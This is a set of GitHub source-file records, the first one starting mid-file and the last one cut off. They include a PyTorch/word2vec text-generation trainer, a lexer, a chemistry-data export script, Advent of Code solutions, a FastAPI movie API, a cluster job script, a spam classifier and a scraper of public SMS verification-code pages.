self.classifier = Classifier(embedding_dim, hidden_dim, last_n, vocab_size)\n self.optimizer = optimizer(self.classifier.parameters(), lr=self.lr)\n\n self.vocab = vocab\n self.invert_vocab = {v: k for k, v in vocab.items()}\n\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.last_n = last_n\n\n self.context: np.ndarray = np.zeros(self.embedding_dim)\n self.last_n_embeddings: np.ndarray = np.zeros((self.last_n, self.embedding_dim))\n self.current_seq_len: int = 0\n\n def get_embeddings(self, tokens: list) -> Tuple[torch.tensor, torch.tensor]:\n embeddings = self.word2vec.wv[tokens]\n self.last_n_embeddings = np.vstack([self.last_n_embeddings, embeddings])[-2:]\n self.new_state = np.mean(embeddings, axis=0)\n\n new_seq_len = len(tokens)\n whole_seq_len = self.current_seq_len + new_seq_len\n\n last_proportion = self.current_seq_len / whole_seq_len\n new_proportion = new_seq_len / whole_seq_len\n\n self.context = last_proportion * self.context + new_proportion * self.new_state\n\n return torch.from_numpy(self.context), torch.from_numpy(self.last_n_embeddings)\n\n def reset(self):\n self.context: np.ndarray = np.zeros(self.embedding_dim)\n self.last_n_embeddings: np.ndarray = np.zeros((self.last_n, self.embedding_dim))\n self.current_seq_len: int = 0\n\n def train_epoch(self, model, optimizer, loss_function: object, device, vocab, lines):\n model.to(device)\n model.train()\n\n epoch_loss = 0.0\n lines_len = len(lines)\n vocab_size = len(list(vocab.keys()))\n\n for line in tqdm(lines):\n seq_len = len(line)\n split_index = seq_len // 2\n input = line[:split_index]\n\n sentence_loss = 0.0\n for i in range(split_index, seq_len - 1):\n context, last_n_embeddings = self.get_embeddings(input)\n context, last_n_embeddings = context.to(device), last_n_embeddings.to(\n device\n )\n output = model(context, last_n_embeddings)\n\n target = torch.zeros(vocab_size)\n target_id = torch.tensor([vocab.get(line[i])])\n target[target_id] = 1\n target, output = target.unsqueeze(0), output.unsqueeze(0)\n loss = loss_function(output, target)\n sentence_loss += loss.item()\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n sentence_loss /= seq_len // 2 - 1\n epoch_loss += sentence_loss\n self.reset()\n\n epoch_loss /= lines_len\n return epoch_loss\n\n def eval_epoch(self, model, loss_function, device, vocab, lines):\n model.to(device)\n model.eval()\n\n lines_len = len(lines)\n epoch_loss = 0.0\n vocab_size = len(list(vocab.keys()))\n for line in tqdm(lines):\n seq_len = len(line)\n split_index = seq_len // 2\n input = line[:split_index]\n\n sentence_loss = 0.0\n for i in range(split_index, seq_len - 1):\n context, last_n_embeddings = self.get_embeddings(input)\n context, last_n_embeddings = context.to(device), last_n_embeddings.to(\n device\n )\n with torch.no_grad():\n output = model(context, last_n_embeddings)\n\n target = torch.zeros(vocab_size)\n target_id = torch.tensor([vocab.get(line[i])])\n target[target_id] = 1\n target, output = target.unsqueeze(0), output.unsqueeze(0)\n loss = loss_function(output, target)\n sentence_loss += loss.item()\n\n sentence_loss /= seq_len // 2 - 1\n epoch_loss += sentence_loss\n self.reset()\n\n epoch_loss /= lines_len\n return epoch_loss\n\n def fit(self, text, eval_percent: float = 0.2):\n total_examples = len(text)\n split_int = int(total_examples * (1 - eval_percent))\n\n train_loss = self.train_epoch(\n model=self.classifier,\n lines=text[:split_int],\n loss_function=self.loss_function,\n device=self.device,\n vocab=self.vocab,\n optimizer=self.optimizer\n )\n print(\"Train Loss:\", train_loss)\n\n eval_loss = self.eval_epoch(\n model=self.classifier,\n lines=text[split_int:],\n loss_function=self.loss_function,\n device=self.device,\n vocab=self.vocab,\n )\n\n print(\"Eval Loss:\", eval_loss)\n\n def generate(self, tokens, seq_len) -> str:\n if tokens is None:\n tokens = ['pad', 'bos']\n tokens += [self.invert_vocab[random.randint(0, self.vocab_size - 1)]]\n\n context, last_n_embeddings = self.get_embdeddings(tokens)\n for i in range(seq_len):\n probabilities = self.classifier(context, last_n_embeddings).softmax(0)\n probabilities, indices = torch.sort(probabilities)\n j = -1\n id = indices[j].item()\n word = self.invert_vocab[id]\n while word in tokens:\n j -= 1\n id = indices[j].items()\n word = self.invert_vocab[id]\n\n tokens += [word]\n context, last_n_embeddings = self.get_embeddings([word])\n return ''.join(tokens)\n else:\n\n context, last_n_embeddings = self.get_embeddings(np.reshape(tokens, -1))\n tokens = list(np.reshape(tokens, -1))\n for i in range(seq_len):\n ids = torch.topk(self.classifier(context, last_n_embeddings), 20).indices.numpy()\n id = np.random.choice(ids)\n word = self.invert_vocab[id]\n tokens += [word]\n context, last_n_embeddings = self.get_embeddings([word])\n return tokens[2:]\n\n def save_model(self, path: str) -> None:\n if not path.endswith(\"pkl\"):\n raise ValueError('Model extension must be .pkl')\n\n with open(f'{path}', 'wb') as f:\n pickle.dump(self, file=f)\n\n @staticmethod\n def load_model(path: str) -> \"Model\":\n if not path.endswith(\"pkl\"):\n raise ValueError(\"Model extension must be .pkl\")\n\n with open(path, \"rb\") as f:\n model = pickle.load(file=f)\n\n return model\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Training')\n parser.add_argument('--input-dir', type=str, help='Data directory path')\n parser.add_argument('--model', type=str, help='Model save path')\n arguments = parser.parse_args()\n VECTOR_SIZE = 32\n preprocessor = Preprocessor(mode=\"train\")\n if arguments.input_dir:\n for file in os.listdir(arguments.input_dir):\n with open(f\"{arguments.input_dir}/{file}\", \"r\") as f:\n text = f.readlines()\n preprocessed_text = preprocessor.preprocess(text)[:15000]\n else:\n text = input().split(\"\\n\")\n preprocessed_text = preprocessor.preprocess(text)[:15000]\n\n word2vec = Word2Vec(sentences=preprocessed_text, vector_size=VECTOR_SIZE, min_count=1, sg=1)\n word2vec.train(preprocessed_text, total_examples=len(preprocessed_text), epochs=20)\n\n vocab = word2vec.wv.key_to_index\n vocab_size = len(list(vocab.keys()))\n\n model = Model(\n word2vec=word2vec,\n loss_function=nn.CrossEntropyLoss(),\n optimizer=torch.optim.Adam,\n lr=0.01,\n device=torch.device(\"cpu\"),\n embedding_dim=VECTOR_SIZE,\n hidden_dim=VECTOR_SIZE,\n last_n=2,\n vocab=vocab,\n vocab_size=vocab_size,\n )\n\n model.fit(preprocessed_text)\n\n model.save_model(arguments.model)\n","repo_name":"AndreyML/tinkoff_text_generation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70170308241","text":"import re\nfrom token import Token\n\ndef find_max_match(text, regex_dict):\n max_token_name, max_end_index = None, 0\n\n for token_name, regex in regex_dict.items():\n submatch = regex.match(text)\n if submatch and submatch.span()[1] > max_end_index:\n max_end_index = submatch.span()[1]\n max_token_name = token_name\n\n return max_token_name, max_end_index\n\nclass Lexer:\n def __init__(self, input_text):\n self.input_text = input_text\n self.tokens = {\n 'COMMENT': 'REM\\W.*?\\\\n',\n 'FOR': 'FOR',\n 'NEXT': 'NEXT',\n 'IDENT': '[a-zA-Z_][a-zA-Z]*[%$#&!]?',\n 'OPERATIONS': '[+\\\\-\\\\/\\\\\\\\]'\n }\n self.tokens_compiled = {k: re.compile(v) for k, v in self.tokens.items()}\n self.pattern = re.compile('|'.join(f'({v})' for v in self.tokens.values()))\n self.spaces = re.compile('\\s+')\n\n def tokenize(self):\n line = 1\n line_index = -1\n current_index = -1\n\n while current_index < len(self.input_text) - 1:\n current_index += 1\n line_index += 1\n char = self.input_text[current_index]\n\n # Пропустить пробелы и переносы строк\n if char in (' ', '\\t'):\n continue\n elif char == '\\n':\n line += 1\n line_index = -1\n continue\n\n text = self.input_text[current_index:]\n\n max_token_name, max_end_index = find_max_match(text, self.tokens_compiled)\n\n if max_token_name:\n yield Token(\n max_token_name, (line, line_index), text[:max_end_index]\n )\n current_index += max_end_index - 1\n line_index += max_end_index - 1\n else:\n print(f\"Syntax error at line {line}, index {line_index}\")\n","repo_name":"PROCENTX123/Compilers","sub_path":"compil1.2/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19270681821","text":"import glob\nimport json\nimport os.path\nfrom typing import TypedDict\n\nfrom loguru import logger\nfrom ord_schema.message_helpers import json_format\nfrom ord_schema.message_helpers import load_message\nfrom ord_schema.proto.dataset_pb2 import Dataset\nfrom ord_schema.proto.reaction_pb2 import Reaction\nfrom tqdm import tqdm\n\n\"\"\"\nfiled name in the output of `protobuf.json_format` is by default camel case\nuse `json_format.MessageToJson(r, preserving_proto_field_name=True)` to output unmodified keys\n\"\"\"\n\n\nclass LData(TypedDict):\n notes__procedureDetails: str # for prompt\n conditions: dict\n reaction_id: str\n inputs: dict[str, dict]\n outcomes: list[dict]\n workups: list[dict]\n warning_messages: list[str]\n\n\nclass LDataExportError(Exception): pass\n\n\ndef clean_compound(compound: dict, msg_prefix: str = \"\") -> list[str]:\n w_msgs = []\n\n # 1. remove non-name identifiers\n identifiers = compound['identifiers']\n new_identifiers = []\n for ii in identifiers:\n if ii['type'].upper() != 'NAME':\n continue\n else:\n new_identifiers.append(ii)\n break\n assert len(new_identifiers) <= 1\n if len(new_identifiers) == 0:\n msg = f\"no name found in compound identifiers: {identifiers}\"\n w_msgs.append(msg)\n else:\n compound['identifiers'] = new_identifiers\n\n # 2. remove invalid amounts\n if 'amount' in compound:\n remove_amount = False\n for kk, vv in compound['amount'].items():\n if not (isinstance(vv, dict) and 'value' in vv):\n continue\n if vv['value'] == 0:\n msg = f\"compound amount invalid, the amount will be removed: {compound}\"\n # raise LDataExportError(msg)\n w_msgs.append(msg)\n remove_amount = True\n break\n if remove_amount:\n compound.pop('amount', None)\n return [msg_prefix + \": \" + m for m in w_msgs]\n\n\ndef reaction_to_llm_data(r: Reaction):\n logger.info(f\"converting reaction: {r.reaction_id}\")\n w_msgs = []\n\n rdict = json_format.MessageToDict(r)\n\n r_key = 'inputs'\n if r_key not in rdict:\n msg = f\"r_key missing: {r_key}\"\n w_msgs.append(msg)\n r_inputs = dict()\n else:\n r_inputs = rdict[r_key]\n for k, v in r_inputs.items():\n try:\n components = v['components']\n except KeyError:\n # possible if the input is represented by crude_components, ex. ord-7c920412f21b4b8195d3bf450f022cbd\n # exclude them for now\n raise LDataExportError(\"cannot find components in reaction.inputs!\")\n for ic, c in enumerate(components):\n w_msgs += clean_compound(c, f\"inputs.[{k}].[{ic}]\")\n\n r_key = 'workups'\n if r_key not in rdict:\n # msg = f\"r_key missing: {r_key}\" # this can be absent\n # w_msgs.append(msg)\n r_workups = []\n else:\n r_workups = rdict[r_key]\n for w in r_workups:\n try:\n workup_input = w['input']\n components = workup_input['components']\n except KeyError:\n continue\n for ic, c in enumerate(components):\n w_msgs += clean_compound(c, f\"workups.components.[{ic}]\")\n\n r_key = 'outcomes'\n if r_key not in rdict:\n msg = f\"r_key missing: {r_key}\"\n w_msgs.append(msg)\n r_outcomes = []\n else:\n r_outcomes = rdict[r_key]\n for outcome in r_outcomes:\n try:\n products = outcome['products']\n except KeyError:\n raise LDataExportError(\"no products in outcome!\")\n for ic, c in enumerate(products):\n w_msgs += clean_compound(c, f\"outcomes.products.[{ic}]\")\n\n try:\n prompt = rdict['notes']['procedureDetails']\n except KeyError:\n raise LDataExportError(\"no input text!\")\n\n ldict = LData(\n notes__procedureDetails=prompt,\n conditions=rdict['conditions'],\n reaction_id=rdict['reactionId'],\n inputs=r_inputs,\n outcomes=r_outcomes,\n workups=r_workups,\n warning_messages=w_msgs,\n )\n return ldict\n\n\ndef convert_datasets(\n output_data_dir=\"data_from_pb_no_warning\",\n local_data_folder=\"/home/qai/workplace/ord-data/data\",\n uspto_only=True,\n keep_only_no_warning=True,\n):\n dataset_files = sorted(glob.glob(f\"{local_data_folder}/*/*.pb.gz\"))\n logger.info(f\"# of dataset files: {len(dataset_files)}\")\n for f in tqdm(dataset_files):\n logger.info(f\"convert dataset file: {f}\")\n dataset = load_message(f, Dataset)\n if uspto_only and \"uspto-grants-\" not in dataset.name.lower():\n logger.critical(f\"skipping non-USPTO dataset: {dataset.name}\")\n output_file = f\"{output_data_dir}/{dataset.dataset_id}.json\"\n if os.path.isfile(output_file) and os.path.getsize(output_file) > 0:\n logger.info(\"output already exists, skipping conversion...\")\n continue\n lds = []\n for r in dataset.reactions:\n try:\n ld = reaction_to_llm_data(r)\n except LDataExportError as e:\n logger.critical(f\"excluding reaction: {r.reaction_id}\\ndue to:{e}\")\n continue\n if keep_only_no_warning and len(ld['warning_messages']) > 0:\n logger.critical(f\"excluding reaction: {r.reaction_id}\\ndue to warning msgs: {ld['warning_messages']}\")\n continue\n lds.append(ld)\n with open(output_file, 'w') as output_fp:\n json.dump(lds, output_fp, indent=2)\n\n\nif __name__ == '__main__':\n logger.remove(0)\n logger.add(__file__.replace(\".py\", \".log\"))\n convert_datasets(keep_only_no_warning=True)\n # 190764 reactions 515 datasets\n","repo_name":"qai222/LLM_organic_synthesis","sub_path":"ord_data/export_from_pb.py","file_name":"export_from_pb.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"18469422288","text":"#Advent of Code 22a\n# Sporifica Virus\n\n#import numpy as np\n\n\nimport time\nstart_time = time.time()\nprint('Fractal Art')\n#file = open('inputTest.txt','r')\nfile = open('input22.txt','r')\ninput = file.read().split('\\n')\nfile.close()\n\n\nprint(input) \n\n#pattern = []\n#for line in input:\n \n#pattern.append('..#')\n#pattern.append('#..')\n#pattern.append('...')\n\ndirections = ['UP','RIGHT','DOWN','LEFT']\ndirectionIndex = 0 #start heading up\n\ninfectedNodes = []\nfor yPos in range( 0, len(input) ):\n for xPos in range( 0, len(input) ):\n if input[yPos][xPos] == '#':\n infectedNodes.append( [xPos,yPos] )\n\nprint(len(infectedNodes) )\nprint( infectedNodes)\n\ndef detectInfected( inputX, inputY ):\n for node in infectedNodes:\n if node == [inputX,inputY]:\n return True\n return False\n\ndef removeInfected( inputX, inputY ):\n for node in infectedNodes:\n if node == [inputX,inputY]:\n #print('found the node to remove')\n infectedNodes.remove(node)\n return\n\ndef turnLeft():\n global directionIndex\n directionIndex -= 1\n if directionIndex < 0:\n directionIndex = 3\n\ndef turnRight():\n global directionIndex\n directionIndex +=1\n if directionIndex > 3:\n directionIndex = 0\n\n#test for sample input\ndef test():\n #check positive detection\n if detectInfected( 2,0 ) and detectInfected( 0,1 ):\n pass\n else:\n print('detectInfected failed')\n return False\n\n if detectInfected( 0,0) or detectInfected( 2,1 ) or detectInfected(2,2):\n print('detectInfected false positive')\n return False\n\n return True\n\nxPos = 12\nyPos = 12\n\n#occurances of infectinos\ninfections = 0\n\nbursts = 10000\nfor x in range(0,bursts):\n #if we are on an infected node disinfect and turn right.\n if detectInfected( xPos, yPos ):\n removeInfected( xPos, yPos )\n turnRight()\n #if we are on a disinfected node, infect and turn left.\n else:\n infectedNodes.append( [xPos,yPos] )\n infections += 1\n turnLeft()\n \n #move forward\n direction = directions[directionIndex]\n if direction == 'UP':\n #print('moving up')\n yPos -= 1\n elif direction == 'LEFT':\n #print('moving left')\n xPos -= 1\n elif direction == 'DOWN':\n #print('moving down')\n yPos += 1\n elif direction == 'RIGHT':\n #print('moving right')\n xPos += 1\n\n #print( 'New Position: ' + str(xPos) + ' ' + str(yPos) )\n\n\n#print( 'Test results = ' + str( test() ) )\n\nprint(time.time() - start_time )\n\nprint( 'Burts : ' + str(bursts) )\n\nprint( 'infection count: ' + str( len( infectedNodes ) ) )\nprint( 'occurences of infection: ' + str( infections ) )\n#print( infectedNodes )\nprint( xPos ,yPos )\n\n\n\n\n\n \n \n \n\n\n\n\n","repo_name":"Jamibaraki/adventOfCode2017","sub_path":"day22a.py","file_name":"day22a.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29231961648","text":"#!/usr/bin/env python3\nimport numpy as np\nimport re\n\npattern = re.compile(r'#(\\d+) @ (\\d+),(\\d+): (\\d+)x(\\d+)')\n\nwith open('03.txt') as infile:\n inputs = infile.read().splitlines()\n\n# Part 1\ncounts = np.zeros([1000, 1000], dtype=int)\nfor line in inputs:\n m = pattern.match(line)\n i, x, y, w, h = [int(x) for x in m.groups()]\n counts[y:y+h, x:x+w] += 1\n\nprint('Squares overlapping', np.sum((counts > 1)))\n\n# Part2\nfor line in inputs:\n m = pattern.match(line)\n i, x, y, w, h = [int(x) for x in m.groups()]\n if np.all(counts[y:y+h, x:x+w] == 1):\n print('Non-overlapping id', i)\n","repo_name":"stianse/advent-of-code-2018","sub_path":"03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73845082000","text":"import sys\n\nsys.dont_write_bytecode = True\nfrom utils import *\n\npuzzle = open('puzzle/05.in').read()\n\nraw_stacks, instructions = puzzle.split('\\n\\n')\n*raw_stacks, indexes = raw_stacks.splitlines()\nstacks_1 = {}\nfor line in raw_stacks:\n for idx, char in zip(indexes, line):\n if idx != ' ' and char != ' ':\n idx = int(idx)\n if idx not in stacks_1:\n stacks_1[idx] = []\n stacks_1[idx].insert(0, char)\nstacks_2 = deepcopy(stacks_1)\n\nfor instruction in instructions.splitlines():\n n, fr, to = get_ints(instruction)\n stacks_1[to].extend(reversed(stacks_1[fr][-n:]))\n del stacks_1[fr][-n:]\n stacks_2[to].extend(stacks_2[fr][-n:])\n del stacks_2[fr][-n:]\n\ntime_print(''.join(v[-1] for _, v in sorted(stacks_1.items()) if v))\ntime_print(''.join(v[-1] for _, v in sorted(stacks_2.items()) if v))\n","repo_name":"filipmlynarski/Advent-of-Code","sub_path":"2022/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41001281850","text":"from fastapi import FastAPI,Depends\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.orm import Session, sessionmaker\nfrom schema import ProductionBase, Production, Staff, StaffBase, Genre, GenreBase, MovieId, Movie, Visualize, UserBase, MovieBase\nfrom sqlalchemy import create_engine\nfrom dotenv import load_dotenv\nfrom typing import List\nfrom . import controller as ctrl \nimport os \n\nload_dotenv()\n\nMYSQL_DATABASE_URL = os.getenv('MYSQL_DATABASE_URL')\n\nengine = create_engine(MYSQL_DATABASE_URL)\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\napp=FastAPI()\norigins = [\"*\"]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n@app.get(\"/production\", tags=[\"production\"])\ndef get_production(production:int, db:Session=Depends(get_db)):\n result = ctrl.get_production(ProductionBase(uid=production),db)\n db.close()\n return result\n\n@app.get(\"/production/all\", tags=[\"production\"])\ndef get_productions(db:Session=Depends(get_db)):\n result = ctrl.get_all_productions(db)\n db.close()\n return result\n\n@app.post(\"/production\", tags=[\"production\"])\ndef create_production(production: Production,db: Session = Depends(get_db)):\n result = ctrl.create_production(production, db)\n db.close()\n return result\n\n@app.post(\"/production/multiple\", tags=[\"production\"])\ndef create_productions(productions: List[Production], db:Session=Depends(get_db)):\n result = ctrl.create_productions(productions, db)\n db.close()\n return result\n\n@app.delete(\"/production\", tags=[\"production\"])\ndef delete_production(production:ProductionBase, db: Session= Depends(get_db)):\n ctrl.delete_production(production, db)\n db.close()\n \n\n@app.patch(\"/production\", tags=[\"production\"])\ndef update_production(production: Production, db:Session=Depends(get_db)):\n ctrl.update_production(production, db)\n db.close()\n\n@app.get(\"/staff\", tags=[\"staff\"])\ndef get_staff(uid:int, db:Session=Depends(get_db)):\n result = ctrl.get_staff(StaffBase(uid=uid),db)\n db.close()\n return result\n\n@app.get(\"/staff/all\", tags=[\"staff\"])\ndef get_staff(db:Session=Depends(get_db)):\n result = ctrl.get_all_staffs(db)\n db.close()\n return result\n\n@app.post(\"/staff\", tags=[\"staff\"])\ndef create_staff(staff: Staff,db: Session = Depends(get_db)):\n result = ctrl.create_staff(staff, db)\n db.close()\n return result\n\n@app.post(\"/staff/multiple\", tags=[\"staff\"])\ndef create_staffs(staffs: List[Staff], db:Session=Depends(get_db)):\n result = ctrl.create_staffs(staffs, db)\n db.close()\n return result\n\n@app.delete(\"/staff\", tags=[\"staff\"])\ndef delete_staff(staffs:StaffBase, db: Session= Depends(get_db)):\n ctrl.delete_staff(staffs, db)\n db.close()\n \n\n@app.patch(\"/staff\", tags=[\"staff\"])\ndef update_staff(staff: Staff, db:Session=Depends(get_db)):\n ctrl.update_staff(staff, db)\n db.close()\n@app.get(\"/genre\", tags=[\"genre\"])\ndef get_genre(genre:int, db:Session=Depends(get_db)):\n result = ctrl.get_genre(GenreBase(uid=genre),db)\n db.close()\n return result\n\n@app.get(\"/genre/all\", tags=[\"genre\"])\ndef get_genres(db:Session=Depends(get_db)):\n result = ctrl.get_all_genres(db)\n db.close()\n return result\n\n@app.post(\"/genre\", tags=[\"genre\"])\ndef create_genre(genre: Genre,db: Session = Depends(get_db)):\n result = ctrl.create_genre(genre, db)\n db.close()\n return result\n\n@app.post(\"/genre/multiple\", tags=[\"genre\"])\ndef create_genres(genres: List[Genre], db:Session=Depends(get_db)):\n result = ctrl.create_genres(genres, db)\n db.close()\n return result\n\n@app.delete(\"/genre\", tags=[\"genre\"])\ndef delete_genre(genre:GenreBase, db: Session= Depends(get_db)):\n ctrl.delete_genre(genre, db)\n db.close()\n \n\n@app.patch(\"/genre\", tags=[\"genre\"])\ndef update_genre(genre: Genre, db:Session=Depends(get_db)):\n ctrl.update_genre(genre, db)\n db.close()\n\n@app.get(\"/movie\", tags=[\"movie\"])\ndef get_movie(uid:int, db:Session=Depends(get_db)):\n result = ctrl.get_movie(MovieId(uid=uid),db)\n db.close()\n return result\n\n@app.get(\"/movie/title\", tags=[\"movie\"])\ndef get_movie_by_title(title:str, db:Session=Depends(get_db)):\n result = ctrl.get_movie_by_title(MovieBase(title=title),db)\n db.close()\n return result\n\n@app.get(\"/movie/all\", tags=[\"movie\"])\ndef get_movie(db:Session=Depends(get_db)):\n result = ctrl.get_all_movies(db)\n db.close()\n return result\n\n@app.post(\"/movie\", tags=[\"movie\"])\ndef create_movie(movie: Movie,db: Session = Depends(get_db)):\n result = ctrl.create_movie(movie, db)\n db.close()\n return result\n\n@app.delete(\"/movie\", tags=[\"movie\"])\ndef delete_movie(movie:MovieId, db: Session= Depends(get_db)):\n ctrl.delete_movie(movie, db)\n db.close()\n\n@app.patch(\"/movie\", tags=[\"movie\"])\ndef update_movie(movie:Movie, db:Session=Depends(get_db)):\n ctrl.update_movie(movie, db)\n db.close()\n\n@app.get(\"/movie/random\", tags=[\"movie\"])\ndef get_random_movies(db:Session=Depends(get_db)):\n result= ctrl.get_random_movies(db)\n db.close()\n return result\n@app.post(\"/watch\", tags=[\"watch\"])\ndef create_visualize_relationship(relations: List[Visualize],db: Session= Depends(get_db)):\n result = ctrl.create_visualize_relation(relations,db)\n db.close()\n return result\n\n@app.get(\"/watch/all\", tags=[\"watch\"])\ndef get_movies_seen_by_user(uid:int, db:Session= Depends(get_db)):\n result = ctrl.get_movies_seen_by_user(uid,db)\n db.close()\n return result\n\n@app.delete(\"/watch\", tags=[\"watch\"])\ndef delete_visualize_relationship(relation:Visualize,db:Session=Depends(get_db)):\n ctrl.delete_visualize_relation(relation,db)\n db.close()\n\n@app.patch(\"/watch\", tags=[\"watch\"])\ndef update_visualize_relationship(new_relation:Visualize,old_relation:Visualize,db:Session=Depends(get_db)):\n ctrl.update_visualize_relation(new_relation=new_relation, old_relation=old_relation,db=db)\n db.close()\n \n@app.post(\"/watch/group\", tags=[\"watch\"])\ndef get_movies_seen_by_group(users: List[UserBase], db:Session= Depends(get_db)):\n result = ctrl.get_movies_seen_by_group(users,db)\n db.close()\n return result","repo_name":"Hiruurouge/WatchOurMovie","sub_path":"movie-service/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2949311266","text":"#!/usr/bin/env python\nimport os, sys\nimport subprocess\n\nopts = {}\nsim = '100'\nopts[\"root\"] = '/data/p-one/mirosant/sim_10tev-10pev/'\nopts[\"out\"] = '/data/p-one/mirosant/sim_10tev-10pev/'+sim+'/Propfiles'\nopts[\"job\"] = '/data/p-one/mirosant/sim_10tev-10pev/jobfiles'\nopts[\"in\"] = '/data/p-one/mirosant/sim_10tev-10pev/Genfiles'\n\nprocessfilename = 'prop_sub'\nsubmissionfilename = 'prop_sub.submit'\n\njob_string = '''#!/bin/bash\n\nbash /data/p-one/mirosant/pone_offline/env-shell_Container.sh python {}/PropogatePhotons.py -i {} -o {} -r $1 -g {}\n\n'''.format(opts[\"root\"]+\"Eventfiles\",\n opts[\"in\"]+\"/gen_\",\n opts[\"out\"]+\"/prop_\",\n \"/data/p-one/mirosant/pone_offline/GCD/PONE_10spacing100.0String.i3.gz\")\n\nwith open(opts[\"job\"] + \"/\" + processfilename + '.sh', 'w') as ofile:\n ofile.write(job_string)\n subprocess.Popen(['chmod','777',opts[\"job\"] + \"/\" + processfilename + '.sh'])\n\nsubmit_string = '''\nexecutable = {}/{}\n\nArguments = $(Item)\noutput = {}_$(Item).out\nerror = {}_$(Item).err\nlog = {}_$(Item).log\n\n+SingularityImage = \"/data/p-one/icetray_offline.sif\"\n\nUniverse = vanilla\nrequest_memory = 4GB\nrequest_cpus = 1\nrequest_gpus = 1\nrequirements = HasSingularity\nrequirements = CUDADeviceName == \"NVIDIA TITAN Xp\"\n\nnotification = never\n\n+TransferOutput=\"\"\n\nqueue from seq {} {} |\n'''.format(opts[\"job\"],\n processfilename + '.sh',\n opts[\"root\"]+\"/logfiles/\"+processfilename,\n opts[\"root\"]+\"/logfiles/\"+processfilename,\n opts[\"root\"]+\"/logfiles/\"+processfilename,\n 1,100)\n\nwith open(opts[\"job\"] + '/' + submissionfilename, 'w') as ofile:\n ofile.write(submit_string)\n\nsubmit = subprocess.Popen(['condor_submit',opts[\"job\"] + '/' + submissionfilename])\n","repo_name":"MiroSant/P-ONE","sub_path":"Simulations/10_tev-10pev/jobfiles/submit_prop.py","file_name":"submit_prop.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6900240623","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom collections import Counter\nimport jieba\nimport joblib\n\njieba.initialize()\nclf = joblib.load(\"./models/Bayes_sklearn.pkl\")\nvsm = joblib.load(\"./models/vsm.pkl\")\n\n\napp = Flask(__name__)\ncors = CORS(app)\n\n\ndef check_spam(text: str):\n data = [text]\n data = [jieba.lcut(x) for x in data]\n data = [Counter(d) for d in data]\n x = vsm.transform(data)\n predicted = clf.predict(x)\n return predicted[0] == 1\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n req = request.get_json()\n text = req[\"text\"]\n v = check_spam(text)\n return jsonify({\"predict\": bool(v)})\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"yuchenyang1994/spam_helper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12057705063","text":"import asyncio\nimport pytest\n\nfrom ..tcp_socket_receiver import Receiver\n\n@pytest.mark.asyncio\nasync def test_tcp_socket_receiver():\n\n async with Receiver() as r:\n print(\"Listening on port %d\" % r.port)\n while True:\n data = await r.receive()\n if data:\n print(data)\n await asyncio.sleep(1)\n","repo_name":"evernym/q","sub_path":"q/transports/tests/tcp_socket_receiver_donttest.py","file_name":"tcp_socket_receiver_donttest.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22926679742","text":"#!/Applications/anaconda3/bin/python\nfrom turtle import Screen, Turtle, color, colormode\nfrom random import randint, choice\nimport colorgram\n\n\ncolors = colorgram.extract('/Users/dmar0022/university/udemy/100_Days_of_Code/final_projects/files/d18_hirst_painting/image.jpg', 30)\ncolorlist = [list(c.rgb) for c in colors][1:]\ncolormode(255)\n\nt=Turtle()\nt.speed(0)\nt.hideturtle()\nt.up()\nt.goto(-200,-200)\n\nfor _ in range(10):\n for _ in range(10):\n t.dot(20,choice(colorlist))\n t.forward(50)\n t.left(180)\n t.forward(50*10)\n t.right(90)\n t.forward(50)\n t.right(90)\n\nscreen=Screen()\nscreen.exitonclick()","repo_name":"atteggiani/100_Days_of_Code","sub_path":"final_projects/files/d18_hirst_painting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32804604533","text":"# 自动抓取云短信网页上的验证码短信并分析来源\n# Tsing 2019.03.21\n# https://zhuanlan.zhihu.com/tsing\n\nimport re\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef get_page_info(link, f):\n\theader={ # 伪造 headers\n\t\t'User-Agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36',\n\t\t'Referer':'https://www.pdflibr.com',\n\t}\n\tr = requests.get(link, headers=header)\n\tsoup = BeautifulSoup(r.content, \"html.parser\")\n\ttable = 